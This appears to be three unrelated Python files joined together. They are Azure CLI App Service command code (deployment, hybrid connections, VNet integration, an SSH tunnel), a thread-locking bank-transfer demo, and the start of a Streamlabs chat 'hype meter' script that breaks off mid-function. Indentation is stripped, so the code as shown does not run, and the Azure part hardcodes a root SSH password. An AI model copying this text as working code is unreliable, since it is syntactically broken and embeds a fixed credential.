"Azure Portal or the Functions Core Tools.", name)
else:
_set_remote_or_local_git(cmd, functionapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
return functionapp
def _set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None):
if deployment_source_url:
logger.warning("Linking to git repository '%s'", deployment_source_url)
try:
config_source_control(cmd, resource_group_name, name, deployment_source_url, 'git',
deployment_source_branch, manual_integration=True)
except Exception as ex: # pylint: disable=broad-except
ex = ex_handler_factory(no_throw=True)(ex)
logger.warning("Link to git repository failed due to error '%s'", ex)
if deployment_local_git:
local_git_info = enable_local_git(cmd, resource_group_name, name)
logger.warning("Local git is configured with url of '%s'", local_git_info['url'])
setattr(webapp, 'deploymentLocalGitUrl', local_git_info['url'])
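# Validates that the storage account exposes blob, queue and table endpoints and uses one of the
# allowed SKUs, then builds a connection string from the first listed account key.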
def _validate_and_get_connection_string(cli_ctx, resource_group_name, storage_account):
sa_resource_group = resource_group_name
if is_valid_resource_id(storage_account):
sa_resource_group = parse_resource_id(storage_account)['resource_group']
storage_account = parse_resource_id(storage_account)['name']
storage_client = get_mgmt_service_client(cli_ctx, StorageManagementClient)
storage_properties = storage_client.storage_accounts.get_properties(sa_resource_group,
storage_account)
error_message = ''
endpoints = storage_properties.primary_endpoints
sku = storage_properties.sku.name.value
allowed_storage_types = ['Standard_GRS', 'Standard_LRS', 'Standard_ZRS', 'Premium_LRS']
for e in ['blob', 'queue', 'table']:
if not getattr(endpoints, e, None):
error_message = "Storage account '{}' has no '{}' endpoint. It must have table, queue, and blob endpoints all enabled".format(storage_account, e) # pylint: disable=line-too-long
if sku not in allowed_storage_types:
error_message += 'Storage type {} is not allowed'.format(sku)
if error_message:
raise CLIError(error_message)
obj = storage_client.storage_accounts.list_keys(sa_resource_group, storage_account) # pylint: disable=no-member
try:
keys = [obj.keys[0].value, obj.keys[1].value] # pylint: disable=no-member
except AttributeError:
# Older API versions have a slightly different structure
keys = [obj.key1, obj.key2] # pylint: disable=no-member
endpoint_suffix = cli_ctx.cloud.suffixes.storage_endpoint
connection_string = 'DefaultEndpointsProtocol={};EndpointSuffix={};AccountName={};AccountKey={}'.format(
"https",
endpoint_suffix,
storage_account,
keys[0]) # pylint: disable=no-member
return connection_string
def list_consumption_locations(cmd):
client = web_client_factory(cmd.cli_ctx)
regions = client.list_geo_regions(sku='Dynamic')
return [{'name': x.name.lower().replace(' ', '')} for x in regions]
def list_locations(cmd, sku, linux_workers_enabled=None):
client = web_client_factory(cmd.cli_ctx)
full_sku = get_sku_name(sku)
return client.list_geo_regions(full_sku, linux_workers_enabled)
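# Polls the Kudu deployment status endpoint every 2 seconds (up to timeout/2 attempts, ~15 minutes
# by default); a reported status of 3 is treated as failure and 4 as success.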
def _check_zip_deployment_status(deployment_status_url, authorization, timeout=None):
import requests
total_trials = (int(timeout) // 2) if timeout else 450
num_trials = 0
while num_trials < total_trials:
time.sleep(2)
response = requests.get(deployment_status_url, headers=authorization)
res_dict = response.json()
num_trials = num_trials + 1
if res_dict.get('status', 0) == 3:
raise CLIError("Zip deployment failed.")
elif res_dict.get('status', 0) == 4:
break
if 'progress' in res_dict:
logger.info(res_dict['progress']) # show only in debug mode, customers seem to find this confusing
# if the deployment is taking longer than expected
if res_dict.get('status', 0) != 4:
raise CLIError("""Deployment is taking longer than expected. Please verify
                       status at '{}' before launching the app""".format(deployment_status_url))
return res_dict
def list_continuous_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_continuous_web_jobs', slot)
def start_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.start_continuous_web_job(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.start_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def stop_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.stop_continuous_web_job(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.stop_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def remove_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_continuous_web_job(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_continuous_web_job(resource_group_name, name, webjob_name)
def list_triggered_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_triggered_web_jobs', slot)
def run_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.run_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.run_triggered_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_triggered_web_job(resource_group_name, name, webjob_name)
def remove_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_triggered_web_job(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_triggered_web_job(resource_group_name, name, webjob_name)
def webapp_list_hc(cmd, name, resource_group):
webapp = _generic_site_operation(cmd.cli_ctx, resource_group, name, 'get', None)
if (webapp.kind == "app"):
return list_hc(cmd, name, resource_group)
else:
print("not a webapp")
def functionapp_list_hc(cmd, name, resource_group):
webapp = _generic_site_operation(cmd.cli_ctx, resource_group, name, 'get', None)
if (webapp.kind == "functionapp"):
return list_hc(cmd, name, resource_group)
else:
print("not a functionapp")
def list_hc(cmd, name, resource_group):
client = web_client_factory(cmd.cli_ctx)
listed_vals = client.web_apps.list_hybrid_connections(resource_group, name)
# reformats hybrid connection, to prune unnecessary fields
mod_list = []
for x in listed_vals.additional_properties["value"]:
properties = x["properties"]
resourceGroup = x["id"].split("/")
mod_hc = {
"id": x["id"],
"location": x["location"],
"name": x["name"],
"properties": {
"hostname": properties["hostname"],
"port": properties["port"],
"relayArmUri": properties["relayArmUri"],
"relayName": properties["relayName"],
"serviceBusNamespace": properties["serviceBusNamespace"],
"serviceBusSuffix": properties["serviceBusSuffix"]
},
"resourceGroup": resourceGroup[4],
"type": x["type"]
}
mod_list.append(mod_hc)
return mod_list
def webapp_add_hc(cmd, name, resource_group, namespace, hybrid_connection):
webapp = _generic_site_operation(cmd.cli_ctx, resource_group, name, 'get', None)
if (webapp.kind == "app"):
return add_hc(cmd, name, resource_group, namespace, hybrid_connection)
else:
print("not a webapp")
def functionapp_add_hc(cmd, name, resource_group, namespace, hybrid_connection):
webapp = _generic_site_operation(cmd.cli_ctx, resource_group, name, 'get', None)
if (webapp.kind == "functionapp"):
return add_hc(cmd, name, resource_group, namespace, hybrid_connection)
else:
print("not a functionapp")
def add_hc(cmd, name, resource_group, namespace, hybrid_connection):
web_client = web_client_factory(cmd.cli_ctx)
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
# calling the relay API to get information about the hybrid connection
hy_co = hy_co_client.get(resource_group, namespace, hybrid_connection)
hy_co_location = hy_co.additional_properties["location"]
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name == "defaultSender":
for z in r.rights:
if z == z.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_info = hy_co.id
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
hy_co_hostname = ''
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
id_parameters = hy_co_info.split("/")
    # populate object with information from the hybrid connection, and set it
    # on the webapp
hc = {
"name": hybrid_connection,
"type": hy_co.type,
"location": hy_co_location,
"properties": {
"serviceBusNamespace": id_parameters[8],
"relayName": hybrid_connection,
"relayArmUri": hy_co_info,
"hostName": hostname,
"port": port,
"sendKeyName": "defaultSender",
"sendKeyValue": hy_co_keys.primary_key
}
}
return_hc = web_client.web_apps.set_hybrid_connection(resource_group, name, namespace, hybrid_connection, hc)
# reformats hybrid connection, to prune unnecessary fields
resourceGroup = return_hc.id.split("/")
mod_hc = {
"hostname": return_hc.hostname,
"id": return_hc.id,
"location": return_hc.additional_properties["location"],
"name": return_hc.name,
"port": return_hc.port,
"relayArmUri": return_hc.relay_arm_uri,
"resourceGroup": resourceGroup[4],
"serviceBusNamespace": return_hc.service_bus_namespace,
"serviceBusSuffix": return_hc.service_bus_suffix
}
return mod_hc
# set the key the apps use to connect with the hybrid connection
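# The selected key ('primary' or 'secondary') of the 'defaultSender' authorization rule is pushed
# to every app on the plan that currently uses this hybrid connection.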
def set_hc_key(cmd, asp, resource_group, namespace, hybrid_connection, key_type):
web_client = web_client_factory(cmd.cli_ctx)
# extract the hybrid connection resource group
asp_hy_co = web_client.app_service_plans.get_hybrid_connection(resource_group, asp, namespace, hybrid_connection)
arm_uri = asp_hy_co.relay_arm_uri
split_uri = arm_uri.split("resourceGroups/")
resource_group_strings = split_uri[1].split('/')
relay_resource_group = resource_group_strings[0]
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
# calling the relay function to obtain information about the hc in question
hy_co = hy_co_client.get(relay_resource_group, namespace, hybrid_connection)
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(relay_resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name == "defaultSender":
for z in r.rights:
if z == z.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(relay_resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(relay_resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
    hy_co_hostname = ''
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
key = "empty"
if key_type.lower() == "primary":
key = hy_co_keys.primary_key
elif key_type.lower() == "secondary":
key = hy_co_keys.secondary_key
    # ensures the key type provided is valid
if key == "empty":
print("Key type is invalid - must be primary or secondary")
return
apps = web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group, asp, namespace,
hybrid_connection)
# changes the key for every app that uses that hybrid connection
for x in apps:
app_info = ast.literal_eval(x)
app_name = app_info["name"]
app_id = app_info["id"]
id_split = app_id.split("/")
app_resource_group = id_split[4]
hc = HybridConnection(service_bus_namespace=namespace, relay_name=hybrid_connection,
relay_arm_uri=arm_uri, hostname=hostname, port=port, send_key_name="defaultSender",
send_key_value=key)
web_client.web_apps.update_hybrid_connection(app_resource_group, app_name, namespace,
hybrid_connection, hc)
return web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group, asp,
namespace, hybrid_connection)
def webapp_remove_hc(cmd, resource_group, name, namespace, hybrid_connection):
webapp = _generic_site_operation(cmd.cli_ctx, resource_group, name, 'get', None)
if (webapp.kind == "app"):
return remove_hc(cmd, resource_group, name, namespace, hybrid_connection)
else:
print("not a webapp")
def functionapp_remove_hc(cmd, resource_group, name, namespace, hybrid_connection):
webapp = _generic_site_operation(cmd.cli_ctx, resource_group, name, 'get', None)
if (webapp.kind == "functionapp"):
return remove_hc(cmd, resource_group, name, namespace, hybrid_connection)
else:
print("not a functionapp")
def remove_hc(cmd, resource_group, name, namespace, hybrid_connection):
client = web_client_factory(cmd.cli_ctx)
return client.web_apps.delete_hybrid_connection(resource_group, name, namespace, hybrid_connection)
def webapp_list_vnet_int(cmd, name, resource_group):
webapp = _generic_site_operation(cmd.cli_ctx, resource_group, name, 'get', None)
if (webapp.kind == "app"):
return list_vnet_int(cmd, name, resource_group)
else:
print("not a webapp")
def functionapp_list_vnet_int(cmd, name, resource_group):
webapp = _generic_site_operation(cmd.cli_ctx, resource_group, name, 'get', None)
if (webapp.kind == "functionapp"):
return list_vnet_int(cmd, name, resource_group)
else:
print("not a functionapp")
def list_vnet_int(cmd, name, resource_group):
client = web_client_factory(cmd.cli_ctx)
result = list(client.web_apps.list_vnet_connections(resource_group, name))
mod_list = []
    # reformats the vnet entry, removing unnecessary information
for x in result:
# removes GUIDs from name and id
longName = x.name
usIndex = longName.index('_')
shortName = longName[usIndex + 1:]
v_id = x.id
lastSlash = v_id.rindex('/')
shortId = v_id[:lastSlash] + '/' + shortName
# extracts desired fields
certThumbprint = x.cert_thumbprint
location = x.additional_properties["location"]
v_type = x.type
vnet_resource_id = x.vnet_resource_id
id_strings = v_id.split('/')
resourceGroup = id_strings[4]
routes = x.routes
vnet_mod = {"certThumbprint": certThumbprint,
"id": shortId,
"location": location,
"name": shortName,
"resourceGroup": resourceGroup,
"routes": routes,
"type": v_type,
"vnetResourceId": vnet_resource_id}
mod_list.append(vnet_mod)
return mod_list
def webapp_add_vnet_int(cmd, name, resource_group, vnet, subnet):
webapp = _generic_site_operation(cmd.cli_ctx, resource_group, name, 'get', None)
if (webapp.kind == "app"):
return add_vnet_int(cmd, name, resource_group, vnet, subnet)
else:
print("not a webapp")
def functionapp_add_vnet_int(cmd, name, resource_group, vnet, subnet):
webapp = _generic_site_operation(cmd.cli_ctx, resource_group, name, 'get', None)
if (webapp.kind == "functionapp"):
return add_vnet_int(cmd, name, resource_group, vnet, subnet)
else:
print("not a functionapp")
def add_vnet_int(cmd, name, resource_group, vnet, subnet):
# parsing the arm uri in order to extract vnet_name and vnet_resource_group
vnet_id_strings = vnet.split('/')
vnet_resource_group = vnet_id_strings[4]
vnet_name = vnet_id_strings[8]
client = web_client_factory(cmd.cli_ctx)
vnet_client = network_client_factory(cmd.cli_ctx)
vnet_info = vnet_client.virtual_networks.get(vnet_resource_group, vnet_name)
swift_connection_info = client.web_apps.get_swift_virtual_network_connection(resource_group, name)
# check to see if the connection would be supported
if swift_connection_info.swift_supported is not True:
print("""Your app must be in an Azure App Service deployment that is
capable of scaling up to Premium v2\nLearn more:
https://go.microsoft.com/fwlink/?linkid=2060115&clcid=0x409""")
return
subnet_resource_id = vnet_info.id + "/subnets/" + subnet
swiftVnet = {
"id": swift_connection_info.id,
"name": swift_connection_info.name,
"type": swift_connection_info.type,
"location": vnet_info.location,
"properties": {
"subnetResourceId": subnet_resource_id,
"swiftSupported": "true"
}
}
return_vnet = client.web_apps.set_swift_virtual_network_connection(resource_group, name, swiftVnet)
    # reformats the vnet entry, removing unnecessary information
id_strings = return_vnet.id.split('/')
resourceGroup = id_strings[4]
mod_vnet = {
"id": return_vnet.id,
"location": return_vnet.additional_properties["location"],
"name": return_vnet.name,
"resourceGroup": resourceGroup,
"subnetResourceId": return_vnet.subnet_resource_id
}
return mod_vnet
def webapp_remove_vnet_int(cmd, name, resource_group):
webapp = _generic_site_operation(cmd.cli_ctx, resource_group, name, 'get', None)
if (webapp.kind == "app"):
return remove_vnet_int(cmd, name, resource_group)
else:
print("not a webapp")
def functionapp_remove_vnet_int(cmd, name, resource_group):
webapp = _generic_site_operation(cmd.cli_ctx, resource_group, name, 'get', None)
if (webapp.kind == "functionapp"):
return remove_vnet_int(cmd, name, resource_group)
else:
print("not a functionapp")
def remove_vnet_int(cmd, name, resource_group):
client = web_client_factory(cmd.cli_ctx)
return client.web_apps.delete_swift_virtual_network(resource_group, name)
def get_history_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_triggered_web_job_history_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.list_triggered_web_job_history(resource_group_name, name, webjob_name)
def create_deploy_webapp(cmd, name, location=None, sku=None, dryrun=False): # pylint: disable=too-many-statements
import os
client = web_client_factory(cmd.cli_ctx)
    # the code to deploy is expected to be in the current directory the command is run from
src_dir = os.getcwd()
# if dir is empty, show a message in dry run
    do_deployment = bool(os.listdir(src_dir))
_create_new_rg = True
_create_new_asp = True
_create_new_app = True
_set_build_appSetting = False
# determine the details for app to be created from src contents
lang_details = get_lang_from_content(src_dir)
    # we support E2E create and deploy for selected stacks; for any other stack, set defaults
    # for os & runtime and skip deployment
if lang_details['language'] is None:
do_deployment = False
        sku = sku or 'F1'
os_val = OS_DEFAULT
detected_version = '-'
runtime_version = '-'
else:
        # keep the user-provided SKU; otherwise fall back to the language's default SKU
        if sku is None:
            sku = lang_details.get("default_sku")
language = lang_details.get("language")
is_skip_build = language.lower() == STATIC_RUNTIME_NAME
os_val = "Linux" if language.lower() == NODE_RUNTIME_NAME \
or language.lower() == PYTHON_RUNTIME_NAME else OS_DEFAULT
# detect the version
data = get_runtime_version_details(lang_details.get('file_loc'), language)
version_used_create = data.get('to_create')
detected_version = data.get('detected')
runtime_version = "{}|{}".format(language, version_used_create) if \
version_used_create != "-" else version_used_create
full_sku = get_sku_name(sku)
location = set_location(cmd, sku, location)
loc_name = location.replace(" ", "").lower()
    is_linux = os_val == 'Linux'
asp = "appsvc_asp_{}_{}".format(os_val, loc_name)
rg_name = "appsvc_rg_{}_{}".format(os_val, loc_name)
# Resource group: check if default RG is set
default_rg = cmd.cli_ctx.config.get('defaults', 'group', fallback=None)
_create_new_rg = should_create_new_rg(cmd, default_rg, rg_name, is_linux)
src_path = "{}".format(src_dir.replace("\\", "\\\\"))
rg_str = "{}".format(rg_name)
dry_run_str = r""" {
"name" : "%s",
"serverfarm" : "%s",
"resourcegroup" : "%s",
"sku": "%s",
"os": "%s",
"location" : "%s",
"src_path" : "%s",
"version_detected": "%s",
"version_to_create": "%s"
}
""" % (name, asp, rg_str, full_sku, os_val, location, src_path,
detected_version, runtime_version)
create_json = json.loads(dry_run_str)
if dryrun:
logger.warning("Web app will be created with the below configuration,re-run command "
"without the --dryrun flag to create & deploy a new app")
return create_json
# create RG if the RG doesn't already exist
if _create_new_rg:
logger.warning("Creating Resource group '%s' ...", rg_name)
create_resource_group(cmd, rg_name, location)
logger.warning("Resource group creation complete")
_create_new_asp = True
else:
logger.warning("Resource group '%s' already exists.", rg_name)
_create_new_asp = should_create_new_asp(cmd, rg_name, asp, location)
# create new ASP if an existing one cannot be used
if _create_new_asp:
logger.warning("Creating App service plan '%s' ...", asp)
sku_def = SkuDescription(tier=full_sku, name=sku, capacity=(1 if is_linux else None))
plan_def = AppServicePlan(location=loc_name, app_service_plan_name=asp,
sku=sku_def, reserved=(is_linux or None))
client.app_service_plans.create_or_update(rg_name, asp, plan_def)
logger.warning("App service plan creation complete")
_create_new_app = True
else:
logger.warning("App service plan '%s' already exists.", asp)
_create_new_app = should_create_new_app(cmd, rg_name, name)
# create the app
if _create_new_app:
logger.warning("Creating app '%s' ....", name)
create_webapp(cmd, rg_name, name, asp, runtime_version if is_linux else None)
logger.warning("Webapp creation complete")
_set_build_appSetting = True
else:
logger.warning("App '%s' already exists", name)
if do_deployment and not is_skip_build:
        # setting the appsettings causes an app restart, so we avoid it if not needed
_app_settings = get_app_settings(cmd, rg_name, name)
if all(not d for d in _app_settings):
_set_build_appSetting = True
elif '"name": "SCM_DO_BUILD_DURING_DEPLOYMENT", "value": "true"' not in json.dumps(_app_settings[0]):
_set_build_appSetting = True
else:
_set_build_appSetting = False
# update create_json to include the app_url
url = _get_url(cmd, rg_name, name)
if _set_build_appSetting:
# setting to build after deployment
logger.warning("Updating app settings to enable build after deployment")
update_app_settings(cmd, rg_name, name, ["SCM_DO_BUILD_DURING_DEPLOYMENT=true"])
if do_deployment:
logger.warning("Creating zip with contents of dir %s ...", src_dir)
# zip contents & deploy
zip_file_path = zip_contents_from_dir(src_dir, language)
logger.warning("Preparing to deploy %s contents to app."
"This operation can take a while to complete ...",
'' if is_skip_build else 'and build')
enable_zip_deploy(cmd, rg_name, name, zip_file_path)
        # Remove the file after deployment, handling the exception if the user removed the file manually
try:
os.remove(zip_file_path)
except OSError:
pass
create_json.update({'app_url': url})
logger.warning("All done.")
return create_json
def _ping_scm_site(cmd, resource_group, name):
# wakeup kudu, by making an SCM call
import requests
    # workaround until the timeout-limits issue for Linux is investigated & fixed
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group, name)
scm_url = _get_scm_url(cmd, resource_group, name)
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{}:{}'.format(user_name, password))
requests.get(scm_url + '/api/settings', headers=authorization)
def is_webapp_up(tunnel_server):
return tunnel_server.is_webapp_up()
def create_tunnel_and_session(cmd, resource_group_name, name, port=None, slot=None):
webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = webapp.reserved
if not is_linux:
raise CLIError("Only Linux App Service Plans supported, Found a Windows App Service Plan")
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
profile_user_name = next(p['userName'] for p in profiles)
profile_user_password = next(p['userPWD'] for p in profiles)
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
if port is None:
port = 0 # Will auto-select a free port from 1024-65535
logger.info('No port defined, creating on random free port')
host_name = name
if slot is not None:
host_name += "-" + slot
tunnel_server = TunnelServer('', port, host_name, profile_user_name, profile_user_password)
_ping_scm_site(cmd, resource_group_name, name)
_wait_for_webapp(tunnel_server)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
s = threading.Thread(target=_start_ssh_session,
args=('localhost', tunnel_server.get_port(), ssh_user_name, ssh_user_password))
s.daemon = True
s.start()
    while s.is_alive() and t.is_alive():
time.sleep(5)
def _wait_for_webapp(tunnel_server):
tries = 0
while True:
if is_webapp_up(tunnel_server):
break
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError("Timeout Error, Unable to establish a connection")
tries = tries + 1
logger.warning('.')
time.sleep(1)
def _start_tunnel(tunnel_server):
tunnel_server.start_server()
def _start_ssh_session(hostname, port, username, password):
tries = 0
while True:
try:
c = Connection(host=hostname,
port=port,
user=username,
# connect_timeout=60*10,
connect_kwargs={"password": password})
break
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError("Timeout Error, Unable to establish a connection")
tries = tries + 1
logger.warning('.')
time.sleep(1)
try:
c.run('cat /etc/motd', pty=True)
c.run('source /etc/profile; exec $SHELL -l', pty=True)
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
finally:
c.close()
def ssh_webapp(cmd, resource_group_name, name, slot=None): # pylint: disable=too-many-statements
import platform
if platform.system() == "Windows":
raise CLIError('webapp ssh is only supported on linux and mac')
else:
create_tunnel_and_session(cmd, resource_group_name, name, port=None, slot=slot)
def create_devops_build(cmd, functionapp_name=None, organization_name=None, project_name=None,
overwrite_yaml=None, use_local_settings=None, local_git=None):
from .azure_devops_build_iteractive import AzureDevopsBuildInteractive
azure_devops_build_interactive = AzureDevopsBuildInteractive(cmd, logger, functionapp_name,
organization_name, project_name,
overwrite_yaml, use_local_settings,
local_git)
return azure_devops_build_interactive.interactive_azure_devops_build()
|
2_safe_bank.py
|
import datetime
import random
import time
from threading import Thread, RLock
from typing import List
class Account:
def __init__(self, balance=0):
self.balance = balance
def main():
accounts = create_accounts()
total = sum(a.balance for a in accounts)
validate_bank(accounts, total)
print("Starting transfers...")
jobs = [
Thread(target=do_bank_stuff, args=(accounts, total)),
Thread(target=do_bank_stuff, args=(accounts, total)),
Thread(target=do_bank_stuff, args=(accounts, total)),
Thread(target=do_bank_stuff, args=(accounts, total)),
Thread(target=do_bank_stuff, args=(accounts, total)),
]
t0 = datetime.datetime.now()
[j.start() for j in jobs]
[j.join() for j in jobs]
dt = datetime.datetime.now() - t0
print(f"Transfers complete ({dt.total_seconds():,.2f}) sec")
validate_bank(accounts, total)
def do_bank_stuff(accounts, total):
for _ in range(1, 10_000):
a1, a2 = get_two_accounts(accounts)
amount = random.randint(1, 100)
do_transfer(a1, a2, amount)
validate_bank(accounts, total, quiet=True)
def create_accounts() -> List[Account]:
return [
Account(balance=5000),
Account(balance=10000),
Account(balance=7500),
Account(balance=7000),
Account(balance=6000),
Account(balance=9000),
]
transfer_lock = RLock()
def do_transfer(from_account: Account, to_account: Account, amount: int):
if from_account.balance < amount:
return
# Not so good:
# transfer_lock.acquire()
#
# from_account.balance -= amount
# time.sleep(.000)
# to_account.balance += amount
#
# transfer_lock.release()
# good!
with transfer_lock: # hold on for all threads
from_account.balance -= amount
time.sleep(.000)
to_account.balance += amount
def validate_bank(accounts: List[Account], total: int, quiet=False):
with transfer_lock:
current = sum(a.balance for a in accounts)
if current != total:
print("ERROR: Inconsistent account balance: ${:,} vs ${:,}".format(
current, total
), flush=True)
elif not quiet:
print(f"All good: Consistent account balance: ${total:,}", flush=True)
def get_two_accounts(accounts):
a1 = random.choice(accounts)
a2 = a1
while a2 == a1:
a2 = random.choice(accounts)
return a1, a2
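# Illustrative sketch (an addition to this listing, not used by main() above):
# instead of one global RLock, each account could carry its own lock, and a
# transfer could acquire the two locks in a fixed order (here: by id()) so that
# two concurrent transfers between the same pair of accounts can never deadlock.
# LockedAccount and do_transfer_fine_grained are assumed names for the sketch.
class LockedAccount(Account):
    def __init__(self, balance=0):
        super().__init__(balance)
        self.lock = RLock()
def do_transfer_fine_grained(from_account: LockedAccount, to_account: LockedAccount, amount: int):
    # Always lock the account with the smaller id() first; a consistent global
    # ordering of lock acquisition is what rules out deadlock.
    first, second = sorted((from_account, to_account), key=id)
    with first.lock, second.lock:
        if from_account.balance < amount:
            return
        from_account.balance -= amount
        to_account.balance += amount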
if __name__ == '__main__':
main()
|
HypeMeter_StreamlabsSystem.py
|
#---------------------------------------
# Import Libraries
#---------------------------------------
import sys
import clr
import json
import codecs
import os
import time
import threading
clr.AddReference("IronPython.SQLite.dll")
clr.AddReference("IronPython.Modules.dll")
#---------------------------------------
# [Required] Script Information
#---------------------------------------
ScriptName = "Hype Meter"
Website = "github.com/hyperneon"
Description = "Hype Meter Overlay That Fills Based on Chat Phrase/Emote Matches"
Creator = "GameTangent"
Version = "1.1.3"
# ---------------------------------------
# Set Variables
# ---------------------------------------
SettingsFile = os.path.join(os.path.dirname(__file__), "settings.json")
ReadMeFile = os.path.join(os.path.dirname(__file__), "ReadMe.txt")
ScriptSettings = None
# ---------------------------------------
# Script Classes
# ---------------------------------------
class Settings(object):
""" Class to hold the script settings, matching UI_Config.json. """
def __init__(self, settingsfile=None):
""" Load in saved settings file if available else set default values. """
try:
with codecs.open(settingsfile, encoding="utf-8-sig", mode="r") as f:
self.__dict__ = json.load(f, encoding="utf-8")
except:
            #TODO Allow this to take an optional list of phrases to look for instead of a single phrase
self.HypePhrases = "gameta5OnFire,casper5CaSpicy"
self.SwitchSceneOnMaxHype = "TestScene"
self.SwitchSceneDelaySeconds = 1
self.EnableSourceOnMaxHype = "TestSource"
self.EnableSourceDelaySeconds = 1
self.EnabledSourceSeconds = 10
self.CommandPermission = "moderator"
self.ResetOnMaxHype = True
self.ResetDelaySeconds = 1
self.CooldownSeconds = 30
self.APIKey = ""
self.LookbackMinutes = 5
self.BlockLengthSeconds = 5
self.HypeLevelCount = 100
self.CountIndividualMatch = False
self.TickTimeSeconds = 5
self.ClipAtMaxHype = True
def Reload(self, jsondata):
""" Reload settings from Chatbot user interface by given json data. """
self.__dict__ = json.loads(jsondata, encoding="utf-8")
return
# ---------------------------------------
# Functions
# ---------------------------------------
def CallbackLogger(response):
""" Logs callback error response in scripts logger. """
parsedresponse = json.loads(response)
if parsedresponse["status"] == "error":
Parent.Log("Hype Meter", parsedresponse["error"])
return
def SwitchSceneDelayTimer(scene, seconds):
""" Switches to a given scene after set seconds. """
counter = 0
while counter < seconds:
time.sleep(1)
counter += 1
Parent.SetOBSCurrentScene(scene, CallbackLogger)
return
def EnableSourceDelayTimer(source, seconds, enabled_seconds):
""" Enables a given source after set seconds. """
counter = 0
while counter < seconds:
time.sleep(1)
counter += 1
Parent.SetOBSSourceRender(source, True, None, CallbackLogger)
if enabled_seconds > 0:
# Start a new thread for the disable timer
threading.Thread(target=DisableSourceTimer, args=(source, enabled_seconds)).start()
return
def DisableSourceTimer(source, seconds):
""" Disables a given source in optional scene after set seconds. """
counter = 0
while counter < seconds:
time.sleep(1)
counter += 1
Parent.SetOBSSourceRender(source, False, None, CallbackLogger)
return
def SendHypeLevelWebsocket(hype_level):
# Broadcast WebSocket Event
payload = {
"hype_level": hype_level
}
Parent.BroadcastWsEvent("EVENT_HYPE_LEVEL", json.dumps(payload))
return
def UpdateEmoteLog(emote_count):
current_time = time.time()
global EmoteLog
global LastLogBlockTime
# Check if we're still within the log block time
if current_time < (LastLogBlockTime + ScriptSettings.BlockLengthSeconds):
# Add emote count to the current block
EmoteLog[-1] += emote_count
else:
# Block time has passed. Create a new block with the current emote count
EmoteLog.append(emote_count)
lookback_length = (ScriptSettings.LookbackMinutes*60) / ScriptSettings.BlockLengthSeconds
EmoteLog = EmoteLog[-lookback_length:]
LastLogBlockTime = current_time
return
def CalculateHypeLevel():
# Simple rolling percent over the period
    # In Python 2 integer division truncates, so multiply by 1.0 to force float division
